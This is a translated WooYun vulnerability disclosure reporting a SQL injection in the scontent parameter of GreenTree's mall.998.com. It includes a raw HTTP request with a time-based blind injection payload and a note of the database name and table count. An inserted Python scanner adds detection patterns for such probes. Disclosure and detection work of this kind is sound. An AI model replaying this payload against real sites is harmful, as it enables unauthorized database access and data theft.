
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0126522

Title: SQL injection in an application of 格林豪泰酒店管理集团 (GreenTree Inns Hotel Management Group)

Vendor: 格林豪泰酒店管理集团 (GreenTree Inns Hotel Management Group)

Author: 路人甲

Submitted: 2015-07-13 18:03

Fixed: 2015-08-28 18:50

Published: 2015-08-28 18:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-07-13: Details sent to the vendor, awaiting vendor action
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and domain experts
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public

Brief description:

........

Detailed description:

Vulnerable site: mall.998.com

GET /grouplist.html?scontent=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://mall.998.com:80/
Cookie: vary=staticdd7e8c7376ac351ea6932ff4d6d30932; s=16dfe4d3343f52e3c99c70de7134a436; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fmall.998.com%2F
Host: mall.998.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


The injectable parameter is scontent.
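As an added example (not part of the original report), a small access-log scanner that URL-decodes query parameters and flags time-based blind SQL injection probes of the kind shown in the request above, i.e. the sleep()/now()=sysdate() markers in scontent; the log lines and function names are the example's own, constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# MySQL time-based blind probe markers (the request above uses the first and third).
TIME_BASED_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
    re.compile(r"\bif\s*\(\s*now\s*\(\s*\)\s*=\s*sysdate\s*\(\s*\)", re.I),
]

# Request part of a combined-format access-log line: "GET /path?query HTTP/1.1"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_params(target):
    """Query parameters of a request target, decoded twice to expose double-encoded probes."""
    return {name: unquote(value)
            for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)}

def find_time_based_sqli(params):
    """Return the names of parameters whose value matches a time-based probe marker."""
    return [name for name, value in params.items()
            if any(pat.search(value) for pat in TIME_BASED_PATTERNS)]

def scan_log(lines):
    """Return (line_number, flagged_parameter_names) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if match:
            flagged = find_time_based_sqli(decode_params(match.group("target")))
            if flagged:
                findings.append((number, flagged))
    return findings

# Constructed sample log (documentation IP range); line 2 carries the payload shape from
# the report, line 3 a double-encoded sleep() probe that a single decode would miss.
PAYLOAD = ("if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))"
           "OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/")
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jul/2015:18:03:00 +0800] "GET /grouplist.html?scontent=hotel HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Jul/2015:18:03:05 +0800] "GET /grouplist.html?scontent=' + PAYLOAD + ' HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Jul/2015:18:03:09 +0800] "GET /grouplist.html?scontent=%2573leep(1) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, params in scan_log(SAMPLE_LOG):
        print(f"line {number}: time-based SQLi probe in {', '.join(params)}")
```

Pairing such hits with the response time of the same request (a sleep(N) probe that succeeds shows an N-second latency spike) separates a blocked attempt from a confirmed injection point.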

[screenshots: w1.png, w4.png]


Database: db_b2b2c
[209 tables]

Proof of vulnerability:

[screenshot: w4.png]

Remediation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-07-14 18:48

Vendor reply:

Thank you for your attention to GreenTree; the relevant staff have been notified to handle it.

Latest status:

None yet

